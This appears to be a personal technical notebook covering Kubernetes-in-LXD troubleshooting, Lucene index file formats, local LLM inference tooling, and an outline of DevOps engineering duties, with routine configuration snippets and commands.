One workaround is creating subvolumes for the container runtime and formatting them in Ext4:

Another Workaround is to have a ZSF enabled containerd in the host and make it accessible inside LXC

There are other solution like using docker loopback plugin ...

Containerd and overlay inside LXC

When running containerd inside LXC, due to Systemd being unable to execute modprobe overlay inside the container (module is already loaded in host kernel).

Containerd is already patched and modprobe errors are ignored.

Cgroups v2 support

Containerd (and runC) supports Cgroups v2 already

I enabled it using this

[plugins]
  [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
    [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options]
      SystemdCgroup = true

  [plugins.cri.containerd.default_runtime]
    runtime_type = "io.containerd.runc.v2"
    runtime_engine = ""
    runtime_root = ""

Try 2: Weird problem

I have a weird problem now, When setting up a cluster with kubeadm, the containers keep restarting until everything crashes. The same thing with microk8s.

A weirder situation is that K0s works fine!

Hypothesis

There is something related to container technologies that's preventing the containers from running properly.

  • In the case of Kubeadm, the kubernetes components run in containers (containerd in my case).
  • In the case of Microk8s, the components run on top of snapd (to be verified).

--> In this case there should be something preventing them (containers, snaps) from running properly.

To verify this I will do the following experiments

  • Run k3s in LXD, since it uses containerd to run the k8s components, it should fail
  • Install kubernetes the hard way, this way I'll install the components as processes not as containers. In this case Everything should work fine.

Edit: Microk8s works fine, the problem was related to the dns plugin which was disabled for some reason. The reason for which Microk8s reports a not running status. microk8s enable dns and everything is working fine.

Kubeadm downgrade

Downgraded kubeadm from 1.22.0 to 1.20.4 and everything seems to work fine!

Can be a version problem! Digging deeper and maybe getting some help from serverfault.

A new problem arose: kube-proxy won't start and fails with open /proc/sys/net/netfilter/nf_conntrack_max: permission denied

The solution was to set nf_conntrack_max in the host.

sudo sysctl net/netfilter/nf_conntrack_max=131072

Managed to upgrade from 1.20.4 to 1.21.4 to 1.22.1 and the cluster is running almost fine, until they aren't.

For 1.21.4 everything was fine while in 1.22.1 nothing works.

It started with some CrashLoopBackOffs and now everything is down.

When I restart the kubelet, the containers start to show off a minute later, and then enter the crash loop again.

My Hypothesis is that this is a version issue, there is something wrong with v1.22 or with my lxd setup or both. To test that I am doing the following

  • Testing v1.22 using k3s or some other distribution.
  • Testing v1.22 with k8s the hard way.

Also v1.22 supports swap so maybe the problem has something to do with swap. I'll check that too:

Asked at k8s.slack.com and the responses suggested that the etcd server is the reason why everything fail and said that from kubernetes 1.21 to 1.22 etcd moved to 3.5.0

The best way and the least time consuming is Kubernetes the hard way since, it will help me in other thing as well. Ans since k8s distro haven't moved to 1.22 yet.

  • https://github.com/inercia/terraform-provider-kubeadm
  • Use Ansible + Terraform is better maybe

Try 3: New cluster

Going back to this project. This works on 1.31+ with a little bit of tweaking. It may work with previous versions, I have not tested them. Initialized a cluster on a 3 machines LXD container instances.

  • Created 3 LXD container instances using LXD terraform provider and cloud-init

It is weird that LXD cloud images for ubuntu/jammy do not come with sshd installed. So I had to install it manually.

  • Getting the annoying error
285 fs.go:595] Unable to get btrfs mountpoint IDs: stat failed on /dev/nvme0n1p3 with error: no such file or directory` error. But apparently it does not affect the cluster health. See Above for more information about the issue.
  • After initializing the cluster, the kube-proxy pod enter a CrashLoop state. A kubectl logs show that the container was failing with:
conntrack.go:100] Set sysctl 'net/netfilter/nf_conntrack_max' to 131072
server.go:495] open /proc/sys/net/netfilter/nf_conntrack_max: permission denied

Apparently kube-proxy is trying to change the value of nf_conntrack_max even if it does not have the permission to do so. This is maybe related to the way LXC loads the kernel modules (Need to dig more on this).

root@k8s-node-0:~# sysctl -p
sysctl: setting key "net.netfilter.nf_conntrack_max": No such file or directory
sysctl: cannot stat /proc/sys/net/nf_conntrack_max: No such file or directory

The solution was to prevent kube-proxy from changing the nf_conntrack_max value by setting maxPerCore to 0 in the kube-proxy configMap. More

kubectl apply -f https://github.com/weaveworks/weave/releases/download/v2.8.1/weave-daemonset-k8s.yaml

References

ElasticSearch

Introduction to Lucene

Ingestion Process

  • Document Creation: User creates a Document object in memory. Data model: Map-like structure with Field objects (e.g., TextField for searchable text, StoredField for retrievable data). Stored in RAM as Java objects.
  • Analysis (Tokenization & Filtering): Tokenize (split into words), Normalize (lowercase, remove stopwords, stem words like "running" → "run").
  • Term Addition to Index: the terms are added to the index in Memoru
  • Segment Flushing: When buffer fills. data is flushed to disk as a new immutable segment
  • Commit & Merging: On commit, segments are merged (background) into larger ones for efficiency

Index Data model

Data model

ls -1 | cut -f2 -d. |sort | uniq
doc
dvd
dvm
fdm
fdt
fdx
fnm
lock
nvd
nvm
pos
segments_4
si
tim
tip
tmd

The most important files are tim, tip, doc and pos. The full model is the following

  • Vocabulary:

    • .tim: Terms Dictionary with All unique terms (words)
    • .tip: Terms Index Pointer/index into .tim
    • .doc: Postings - Frequencies
    • .pos: Postings - Positions
  • Stored Fields (Original Document Storage)

    • .fdt: Field Data - Actual stored field values (like a database)
    • .fdx: Field Index - Pointers to data in .fdt
    • .fdm: Field Metadata - Compression info (Describes field types, analyzers, norms, etc.)
  • Doc Values (Column-oriented Storage)

    • .dvd: Doc Values Data - For sorting/faceting
    • .dvm: Doc Values Metadata
  • Norms (Field Length Normalization)

    • .nvd: Norms Data - Field length info for scoring
    • .nvm: Norms Metadata
  • Metadata Files

    • .fnm: Field Names - Maps field IDs to names.
    • .si: Segment Info - Segment metadata (doc count, codec, version, deleted docs, etc.).
    • .tmd: Term Vector Metadata - For term vector storage. (Extra info for .tim and .tip.)
    • segments_4: Master file listing all segments (Lists all segments, their versions, and commit metadata.)
    • write.lock: Write lock (prevents concurrent writes)

Example

  • The document
# Document
0, "Hello World", "Lucene stores documents efficiently"
1, "Apache Lucene", "Lucene uses segments to store data"
2, "Search Engines", "Elasticsearch is built on Lucene"
  • Metadata files
# .fnm
0: title (indexed=true, stored=true, hasTermVectors=false)
1: body (indexed=true, stored=false, hasNorms=true)

# .tmd: Term Metadata, stores extra metadata about terms (field-level summaries, term stats, checksums).
Field "title": 3 unique terms
Field "body": 6 unique terms
checksum: 0xA32F9C

# .si: Segment Info, describes the whole segment.
Segment name: _2
Lucene version: 9.0
Doc count: 3
Deleted docs: 0
Files: [_2.fdt, _2.fdx, _2.tim, _2.tip, ...]

# segments_4: Commit point, global file listing all segments that make up the index.
Segments:
  _2 (3 docs)
  _3 (7 docs)
  _4 (2 docs)
Generation: 4

# write.lock
hostname=localhost
processId=12345
  • Stored fields
# .fdt: Documents and their stored field 
Doc 0:
  title = "Hello World"
Doc 1:
  title = "Apache Lucene"
Doc 2:
  title = "Search Engines"

# .fdx: offsets for each Doc to help lucene to seek inside .fdt
Doc 0 offset: 0
Doc 1 offset: 34
Doc 2 offset: 71

# .fdm: metadata about how fields are stored and indexed
Field "title":
  type: text
  analyzer: standard
  norms: no
Field "body":
  type: text
  analyzer: standard
  norms: yes
  • Dictionary files
# .tim: Term dictionary for indexed fields
Term Dictionary:
  body: [
    "built" -> docFreq=1, totalTermFreq=1
    "data" -> docFreq=1, totalTermFreq=1
    "elasticsearch" -> docFreq=1, totalTermFreq=1
    "lucene" -> docFreq=2, totalTermFreq=2
    "segments" -> docFreq=1, totalTermFreq=1
    "stores" -> docFreq=1, totalTermFreq=1
  ]
  title: [
    "apache" -> docFreq=1
    "hello" -> docFreq=1
    "search" -> docFreq=1
  ]

# .tip: Pointers for terms in .tim file (for fast seek)
Pointers:
  "apache" → offset 0
  "lucene" → offset 128
  "search" → offset 192

# .doc: Postings (docIDs), lists which documents contain each term. 
Term: "lucene"
  → docIDs = [1, 2]
Term: "search"
  → docIDs = [2]
Term: "hello"
  → docIDs = [0]

# .pos: Positions, word positions within documents (for phrase queries, proximity).
Term: "lucene"
  Doc 1: positions [0]
  Doc 2: positions [4]
  • Doc values (Columnar values)
# .dvd columnar storage for sorting, faceting, analytics.
Field "popularity" (numeric doc values)
Doc 0: 10
Doc 1: 25
Doc 2: 5

# .dvm: contains metadata (like offsets, encodings).
Field count: 2
Field 0: popularity (numeric)
  offset: 0x00000010
  encoding: delta-compressed int
Field 1: category (sorted)
  offset: 0x00000100
  encoding: terms dictionary

  • Norms
# .nvd per-field normalization factors (used in scoring).
Field: body
Doc 0: norm=0.577
Doc 1: norm=0.707
Doc 2: norm=0.5

# .nvm: norms metadata.
Field count: 1
Field 0: body (norms)
  offset: 0x00000000
  encoding: byte
  numDocs: 3

Field Settings

Each field in a lucene document has the following boolean separate settings:

  • indexed: The field is searchable (terms go into the inverted index).
  • stored: The field’s original value is saved so it can be retrieved with the document.
  • docValues: The field’s value is stored in columnar form for sorting, faceting, etc.

Norms

Norms are small numeric factors Lucene computes per field, per document to help with relevance scoring.

They typically encode things like:

  • How long the field is (shorter fields often get a boost),
  • Whether it contains many terms,
  • Field-level boosts applied at indexing time.

These are used when computing the TF-IDF or BM25 score that determines how relevant a document is to a query.

Doc values

Doc values are Lucene’s columnar data store — think of them like a per-field database column.

They’re designed for:

  • Sorting: e.g., sort search results by “price” or “date”
  • Faceting: e.g., count how many documents per “category”
  • Analytics: e.g., compute averages, histograms, or aggregations

Index operations

Deletions

The deletes are soft, each segment has bitset for each doc. 0 is set to set the doc for deletion.

On Segment merge, the segments with higher deleted docs are prioritized.

Updates

Updating a previously indexed document is a “cheap” delete followed by a re-insertion of the document. Updating a document is even more expensive than adding it in the first place. Thus, storing things like rapidly changing values in a Lucene index is probably not a good idea – there is no in-place update of values.

References

LLMs

Running LLMs

Timeline:

Inception

  • Sept 2022: Georgi Gerganov initiated the GGML (Georgi Gerganov Machine Learning) library as a C library implementing tensor algebra with strict memory management and multi-threading capabilities. This foundation would become crucial for efficient CPU-based inference.
  • Mar 2023: llama.cpp built on top of GGML with pure C/C++ with no dependencies. -> LLM execution on standard hardware without GPU requirements.
  • Jun 2023: Ollama Docker-like tool for AI models, simplifying the process of pulling, running, and managing local LLMs through familiar container-style commands. It became the easiest entry point for users wanting to experiment with local models.

Standardization

  • Aug 2023: GGUF format (GGML Universal Format) successor to GGML format. GGUF provided an extensible, future-proof format storing comprehensive model metadata and supporting significantly improved tokenization code.
  • 2024: Multiple tools
    • vLLM emerged as a high-throughput inference server optimized for serving multiple users
    • GPT4All developed into a comprehensive desktop application with over 250,000 monthly active users
    • LM Studio became a popular cross-platform desktop client for model management

The flow

image

Building the model

  • Model is built and trained used PyTorch, Tensorflow, Jax or another framework
  • The frameworks outputs the model weights:
    • JAX/Flax: msgpack checkpoints (flax_model.msgpack) + config.json
    • Tf/Keras: SavedModel directory (saved_model.pb + variables/) or HDF5 file (model.h5)
    • PyTorch: .pt or .pth saved with torch.save(model.state_dict(), "model.pt")
    • ONNX (Open Neural Network Exchange) a cross-framework intermediate format used to transfer models, it has a ONNX runtime which can run it
  • The models can be converted to Hugging Face model formats
    • pytorch_model.bin or model.safetensors → the weights (can be multiple shards if big).
    • config.json → architecture hyperparameters (hidden size, number of layers, etc.).
    • tokenizer.json, tokenizer.model, special_tokens_map.json, etc. → tokenizer files.
    • generation_config.json → default generation params.

model.safetensors is a safe, zero-copy serialization format for tensors. Alternative to PyTorch’s pickle-based .bin (which can execute arbitrary code on load — unsafe). And supports other frameworks like TF and Jax. And it is convertible to GGUF and other formats and can be run by vLLM natively.

Running the models (vLLM vs llama.cpp)

  • vLLM: Runs the model in HF format (Inference). It can start a inference server with OpenAI-compatible API
  • The model can be converted further (compiled into) to TensorRT which is NVIDIA’s inference optimization runtime (For all DL models). It takes a model in any format (PyTorch, ONNX) and compiles it into a TensorRT engine .plan file highly optimized for Nvidia GPUs. (This is used if we are targeting Nvidia GPUs)

vLLM doesn’t use TensorRT by default (it uses its own kernel tricks), but you could use TensorRT separately.

  • In Apple Silicon the model can be converted using MLX to use the Integrated Memory. MLX optimized the model for inference in Apple Silicon (quantization for example)
  • Convert the model from HF format to GGUF format (Quantization).
  • Run the GGUF on llama.cpp on CPU and low resource hardware.

Running the models as a user

  • Create a Modelfile to package the model a la Dockerfile.
FROM ./model-q4_k_m.gguf
PARAMETER temperature 0.7
TEMPLATE """{{ .Prompt }}"""
  • Build the model ollama create mymodel -f Modelfile and run it ollama run mymodel.

  • We can push/pull the model.

  • While ollama is developer friendly/focused, there are other tools geared towards end users like gpt4all and LM studio (GUI first, marketplace, builtin chat ui ...)

  • Common AI Model Formats

Running Local LLMs

Prerequisites

  • CUDA: Application programming interface for Nvidia GPUs
  • AMD ROCm is an open software stack including drivers, development tools, and APIs that enable GPU programming from low-level kernel to end-user applications.
  • Intel OneApi: Same but has a different goal, trying to standardize computation over CPU and GPUs and FPGAs ...

Inference Engines

image

Serving Frameworks

image These are serving frameworks in the sense that they do the entire thing including compression, deployment, Serving, memory management, Caching ... While the previous category only runs the model on the hardware (with some optimization but not a fully fledged framework). -LMDeploy: it is also a solution for running LLMs (Inference).

Dev Oriented

  • Ollama: Uses docker like concepts to manage and run models
  • LocalAI:
    • It supports a lot of backends including llama.cpp, vllm, and hf transformers ...
    • It support Hardware acceleration on various models.
    • If I can say it is the most complete but it feels cumbersome.
    • It support a declarative way to define models.
    • It is container first. Run with container images | LocalAI
  • mozilla-ai/llamafile: 1 executable file models (it relies on llama.cpp)

Containers

  • Ramalama:
    • Supports multiple transports (ollama:// hf:// and oci:// and ModelScope://)
    • ramalama support 3 runtimes: ollama.cpp, vllm and mlx.
    • It starts a container image with everything needed to run the model including optimizations. On run ramalama detects the GPU information and decides which image to use.
  • Docker:
    • Same but the ai models are not standard OCI images, which make them not pull-able from ramalama
    • Docker has introduced ability to run MCP servers.

GUIs

tools

DevOps Guide

DevOps engineering

"DevOps Engineer"" is a highly relative job title. Purists will tell you the term makes no sense because DevOps is a methodology, not a person. Yet, you will find thousands of job listings, each defining the role differently.

In many cases, these positions are simply rebranded Operations engineers or SysAdmin roles equipped with modern tooling. However, the actual scope of a DevOps Engineer varies widely and typically entails one or more of the following tasks:

  • Build: Core Infrastructure & Operations
    • Provisioning and maintaining resources, whether on-premise or in the cloud.
    • System Administration: Installing, patching, and maintaining OS-level components (Linux/Windows). This includes managing users, permissions, and filesystems.
    • Configuration Management: Automating the setup and maintenance of software configurations across servers.
    • Networking & Storage: Managing software-defined networking (VPCs, subnets) and storage volumes.
    • Operations Management: Handling routine maintenance, backups, and general system health.
    • Database Management: Basic provisioning, replication setup, and ensuring data persistence.
  • Design: Architecture & Design
    • System Design: Architecting solutions based on needs, e.g. choosing between loosely coupled (microservices) or tightly coupled (monoliths) structures.
    • High Availability & Scalability Strategy: Designing systems to withstand traffic spikes (auto-scaling) and regional failures (redundancy).
    • Cloud Architecture: eciding which managed services (Serverless, Managed SQL, Object Storage) to use versus building from scratch.
  • automate: Automation & Tooling
    • Automation: Replacing manual UI interactions with reproducible code.
    • Scripting & Middleware Development: Writing scripts to connect tools that don't natively talk to each other.
    • Infrastructure as Code (IaC): Defining the entire environment in configuration files rather than manual setup.
  • Release Engineering & Software Supply Chain
    • Software Supply Chain Management: Managing dependencies, auditing libraries for safety, and generating Software Bill of Materials (SBOM).
    • Deployment Strategy (e.g., Weekly Deployment): Executing releases using strategies like "Blue/Green" swaps or "Canary" releases to limit the blast radius of errors.
    • Version Control Management: Enforcing branching strategies (e.g., GitFlow vs. Trunk-Based) to keep code organized.
    • Artifact Management: Securing compiled binaries and container images in private registries.
  • Operate: Reliability & Incident Management (SRE)
    • Monitoring & Observability: Setting up dashboards to track metrics (CPU, latency), logs (errors), and traces (user journey).
    • Incident Response: Acting as the first responder during outages to triage and coordinate fixes.
    • Post-Incident Review (Post-Mortems): Writing Root Cause Analysis (RCA) reports after incidents to prevent recurrence.
    • Chaos Engineering: Stress-testing systems by intentionally breaking components to ensure recovery automation works.
  • Help: Developer Experience (DevEx)
    • Developer Environment Building: Creating pre-configured environments (e.g., DevContainers) so new hires can code on Day 1 without setup friction.
    • Internal Developer Platform (IDP): Building self-service portals where developers can provision their own resources without blocking Ops.
    • Documentation & Knowledge Base: Maintaining runbooks and wikis to prevent "brain drain" when engineers leave.
  • Protect: Security & Governance (DevSecOps)
    • Security & Compliance: Ensuring infrastructure meets legal standards (GDPR, HIPAA, PCI-DSS) and internal policies.
    • Identity & Access Management (IAM): Enforcing "Least Privilege" to ensure developers don't have unnecessary "God mode" access to production.
    • Vulnerability Scanning: Automating security checks for both infrastructure (OS patches) and application code (libraries).
  • Collaborate: Culture & People
    • Team Support: Acting as a technical unblocker for development teams.
    • Coaching: Providing DevOps coaching to teams to instill cultural best practices.
    • FinOps: Monitoring cloud costs and guiding teams toward architecting cost-effective solutions.

Fundamentals

Networking

Storage